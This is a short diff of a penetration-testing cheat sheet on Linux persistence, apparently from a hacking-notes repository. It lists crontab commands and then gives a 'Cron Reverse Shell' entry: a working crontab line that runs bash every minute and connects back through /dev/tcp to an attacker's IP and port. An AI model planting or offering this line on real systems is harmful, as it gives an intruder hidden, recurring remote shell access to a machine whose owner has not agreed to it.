ice-wzl/Hacknetics/persistence.md

 `cat /etc/crontab`
 - Allows you to see the system wide cron jobs
 `crontab -e`
--Allows you to edit the file for your users cron jobs `crontab -l`
+- Allows you to edit the file for your users cron jobs `crontab -l`
--Prints the cron jobs set for your user
+- Prints the cron jobs set for your user
 #### Cron Reverse Shell
 `* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/172.16.6.1/1234 0>&1`
 - Creates a reverse shell that call back to your attack box ip every minute